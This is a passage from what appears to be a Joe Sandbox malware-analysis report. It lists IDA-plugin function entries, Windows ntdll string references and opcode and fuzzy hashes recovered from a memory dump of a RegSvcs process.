                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 0143AA13
                                                          • LdrResSearchResource Exit, xrefs: 0143AA25
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • kLsE, xrefs: 01430540
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0143063D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0143A309
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0143A2FB
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 014B895E
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2313800ac8606bf19b2560cad01507f93470766162aaa564226493c2c2c09593
                                                          • Instruction ID: 74d832c21929298b5322c4acaad177ae1b79ab73a51549faac3bbd012bce9555
                                                          • Opcode Fuzzy Hash: 2313800ac8606bf19b2560cad01507f93470766162aaa564226493c2c2c09593
                                                          • Instruction Fuzzy Hash: AE71CE75D0166A9BDB25CF59C4907BEBBB0FF5A710F18421BE852AB360D7309806CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6abb5a4ea41cb7b5628a948314a96bd4d4971d733f6133d4697409b3fc017293
                                                          • Instruction ID: f3c252aecd3160afc43d516f40f2c76a5292b012c5f1c21dcb70f8f9cf9cbee4
                                                          • Opcode Fuzzy Hash: 6abb5a4ea41cb7b5628a948314a96bd4d4971d733f6133d4697409b3fc017293
                                                          • Instruction Fuzzy Hash: 9D71A472D00209DFDB30DF59C548A9ABBF4FF91311F19415BEA20EB2A8C7359944DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a5530775fecbdebb504b7c07ee78dd8c829a31d57761c9d1a17d24f7e18a6d6
                                                          • Instruction ID: c4228bc322da22e8cb0fb62468f3262074fe4e0c06498d40d0b5adc81a752dbb
                                                          • Opcode Fuzzy Hash: 0a5530775fecbdebb504b7c07ee78dd8c829a31d57761c9d1a17d24f7e18a6d6
                                                          • Instruction Fuzzy Hash: 3871DE356046429FE311DF29D484B2ABBE5FF98310F0585ABF898CB362DB74D846CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction ID: ec90a2dbd45528b6ceb789827d7ddcd78e7d125752641d04e67c8cc548d91226
                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction Fuzzy Hash: 60715171D0061AAFDB10DFAAC984EDEBBB9FF58700F10456AE505A7260DB34EA41CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5035d395680c6fca842d01319b3be683572b4d330684586a4fd8afba9e35aa12
                                                          • Instruction ID: ab7c509695e03af2c431323b8fce4a038084e8f3dcb97c49d81bb3729732a436
                                                          • Opcode Fuzzy Hash: 5035d395680c6fca842d01319b3be683572b4d330684586a4fd8afba9e35aa12
                                                          • Instruction Fuzzy Hash: CC71F43A200701AFE732DF19C844F66BBA6EF50B20F16852EE2558B3B1D774E945CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6cabcf4ca651eeb2534b7dddda03e67c9d034cf9c181d17aa4afd2e513267d3
                                                          • Instruction ID: ce0e268d4a05bf693ab530af9d5b852c672290a8932cc08b4636920974ac3ab5
                                                          • Opcode Fuzzy Hash: e6cabcf4ca651eeb2534b7dddda03e67c9d034cf9c181d17aa4afd2e513267d3
                                                          • Instruction Fuzzy Hash: 93711B71E00619BFDB16DFD5CC41FEEBBB8FB14750F10451AE610AA290D774AA45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4806c6bf3514d24a93377ac572a5964e31af50c4475dca55cebc8f47cb1af559
                                                          • Instruction ID: 8f6017d79b42bc55fbf9278b71227a8330dc52bca3cdc1907500078f0746a5c8
                                                          • Opcode Fuzzy Hash: 4806c6bf3514d24a93377ac572a5964e31af50c4475dca55cebc8f47cb1af559
                                                          • Instruction Fuzzy Hash: A451CF72504612AFD722DE69C848E5BBBE8EBD5715F01093EFA40DB260D770ED05CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c368761c3fba839d037957d6f1ae3c432ece57cd074f3c676d2941e65f0dac
                                                          • Instruction ID: d5cef45ac008fb2dd077869b51a9d24d549b30128eb464c8c2e91d9422291eff
                                                          • Opcode Fuzzy Hash: a8c368761c3fba839d037957d6f1ae3c432ece57cd074f3c676d2941e65f0dac
                                                          • Instruction Fuzzy Hash: 4451BD709007069FDB21DF5AC890AABFBF8BFA4714F10462FD296976B0D7B0A541CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: faa54f02403f55b47086c55879031044e48b1b796b62bc850bf6f9b5df926af7
                                                          • Instruction ID: 0a5f3e0328ba4c8817d1448cb92f3c77d5b90df9e053b464067dba6a72e1d80f
                                                          • Opcode Fuzzy Hash: faa54f02403f55b47086c55879031044e48b1b796b62bc850bf6f9b5df926af7
                                                          • Instruction Fuzzy Hash: EC514A72200A15DFDB22EFAAC980EAAB3FDFB24648F41042FE55197270E730E941CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b08efc838044943fd52f67a21d1da1f24766b8f696ff474b9a4390972ef1683b
                                                          • Instruction ID: 3639832c562dc8c163bcb4b4bc724696d4ba19c5f42e2a1ff7a7a473092dc0f3
                                                          • Opcode Fuzzy Hash: b08efc838044943fd52f67a21d1da1f24766b8f696ff474b9a4390972ef1683b
                                                          • Instruction Fuzzy Hash: 275157716083428FDB54DF6EC890A6BBBE5BFD8604F48492EF589C7660EB30D905CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction ID: 12399529734fcae3bfdf5bfe1ce5173cbbe8aa5afeb6834a92d51816653743fa
                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction Fuzzy Hash: 78518F71D0021AABDF55DF94C440BEEBBB5AF45754F08406AEA05AF361E734ED84CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction ID: 273bb2f9d91e47c23e12f01570ac3ec287472cd45f2547d5aed08031b470ff4a
                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction Fuzzy Hash: 1951B53190420AABEF21DA95C8D0BEFBB78AB94324F11465BD612772B1D7709E4187B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 314d51e0f4d694301f4e4d1d712c2ec6a10cdb591a2085dfd637c4db01885b53
                                                          • Instruction ID: 18c3039f54a414b512f1ccc31564bd8a6a7fd199f0e598347e99c8b2c7b6b301
                                                          • Opcode Fuzzy Hash: 314d51e0f4d694301f4e4d1d712c2ec6a10cdb591a2085dfd637c4db01885b53
                                                          • Instruction Fuzzy Hash: 5C41D6707016579BE625DB2DC895B7BBB96EF90620F04411EFB558F3A1DB30D801C691
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dec917ec6112eaf279d123911d254ecb4ac382f1306dee194fe67210f0daf15d
                                                          • Instruction ID: bf9c8a7cb144928bd4fca1ffd9cf31e5f68fc50b5ce44aa6450509effcca2911
                                                          • Opcode Fuzzy Hash: dec917ec6112eaf279d123911d254ecb4ac382f1306dee194fe67210f0daf15d
                                                          • Instruction Fuzzy Hash: 37517C76A00216DFCB30DFA9C9C09AFBBB9FB69354B11451AD916A7310D770AD02CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b3c9ca7f64e37dd9901213dce8731289e9fa0cf2299c9401c036fc6d82fe40e
                                                          • Instruction ID: 2e43575e36e1a43579f9c902e732e13e703be1aeae6ce48f2b5746b6db8f5008
                                                          • Opcode Fuzzy Hash: 7b3c9ca7f64e37dd9901213dce8731289e9fa0cf2299c9401c036fc6d82fe40e
                                                          • Instruction Fuzzy Hash: 1F413B726002119BDB39EF69D880B6A3768EB6670CF47102FED05AF361D771D8048752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction ID: 1e15947ce112dbd411fa6fa98f8a2ab478f866d4af6c75b8e58af001b072a4c3
                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction Fuzzy Hash: 2D41F631A007169FD725CF28C884A6BB7A9FF90210B14462FEB1687760EB30EC0DCB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34b77a287ed4f065a7c6b2aa89692bf24e50ae6f90f0cca7d3a56a82da4b7279
                                                          • Instruction ID: de8f17b97ffb94ee69698b0276d5ea348ef4bd75e33dcc27a69619e66876c220
                                                          • Opcode Fuzzy Hash: 34b77a287ed4f065a7c6b2aa89692bf24e50ae6f90f0cca7d3a56a82da4b7279
                                                          • Instruction Fuzzy Hash: 3A41BC369002199BDB14DF99C440AEEBBB8BF58718F15816FF815E7360D7349C42CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc2e505c00c6a3d3f83a4875728fb1c2ebad78ef94b6fefe40d884269ee28fe0
                                                          • Instruction ID: 93cb0328f3d815b5abafb127afd3786a5b41ed4973db3955bc9a0aa83a45294c
                                                          • Opcode Fuzzy Hash: fc2e505c00c6a3d3f83a4875728fb1c2ebad78ef94b6fefe40d884269ee28fe0
                                                          • Instruction Fuzzy Hash: 6E41F6712043029FDB61DF29C884A27BBE5FF94214F00492FE957D7722DB31E5498B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction ID: a6ceae441cd459d250fc26a053a888de9849de44533d0a65bc4937e6c6e77d6f
                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction Fuzzy Hash: 89517B75A00215CFDB15CF98C480AAEF7B2FF94710F6981AAD915A7361D770AE42CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 255fc52c12b3ae75c009c5fcc636d54206ba81f57c3750fb7a2e867c64d1260b
                                                          • Instruction ID: 5c733a0177b0cb3d85a189e96348897225b33c27be589f88af59393a7bdf9ac3
                                                          • Opcode Fuzzy Hash: 255fc52c12b3ae75c009c5fcc636d54206ba81f57c3750fb7a2e867c64d1260b
                                                          • Instruction Fuzzy Hash: 14513771900117EBEB359B28CC00BA9BBB4FF55314F0642ABE525973E1D7745A81CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7514b1e58e6b975ccbefc8328b9cabc11ccd1ba9d04e435ee7e41dd088b5d6aa
                                                          • Instruction ID: 12845b2860db9570bde76627e5b8a447bb92e1e5edc6b3bf38380087c1af5488
                                                          • Opcode Fuzzy Hash: 7514b1e58e6b975ccbefc8328b9cabc11ccd1ba9d04e435ee7e41dd088b5d6aa
                                                          • Instruction Fuzzy Hash: 5041A731A002299BDB21EF69C940BEE77B4EF99750F0101AAE908AB361D774DE85CB51
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction ID: f476796af880010fb3d63a11feac36c0c10b44e89536045c8e0692b236eca458
                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction Fuzzy Hash: 42419575B00206ABEB15DF99CC95AAFBBBAAF94600F14406EE6049B361D670DD11C760
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 414e205ce933ffacdcaf53fed084dcf4d969b1fe735bc26cb642e525769610e2
                                                          • Instruction ID: d20630913291378d00d9b8cb346fabadda688c810839897e287a0e57c3710436
                                                          • Opcode Fuzzy Hash: 414e205ce933ffacdcaf53fed084dcf4d969b1fe735bc26cb642e525769610e2
                                                          • Instruction Fuzzy Hash: EC41A0B1600702DFE325DF29D580A26BBF9FF89314B144A6FE55787A60E730E846CB90
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8163b808ec9309288464ada25379b96596b5ecdd32f92aadb995d847bed3db24
                                                          • Instruction ID: 231881c5f341120608dc9b7b3381de38ef197a3b00f88ff443763bd29b16c93d
                                                          • Opcode Fuzzy Hash: 8163b808ec9309288464ada25379b96596b5ecdd32f92aadb995d847bed3db24
                                                          • Instruction Fuzzy Hash: A241E032900219CFDF61DF68D454BAE7BB0FB59314F25026BD921BB3A2DB349905CBA4
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
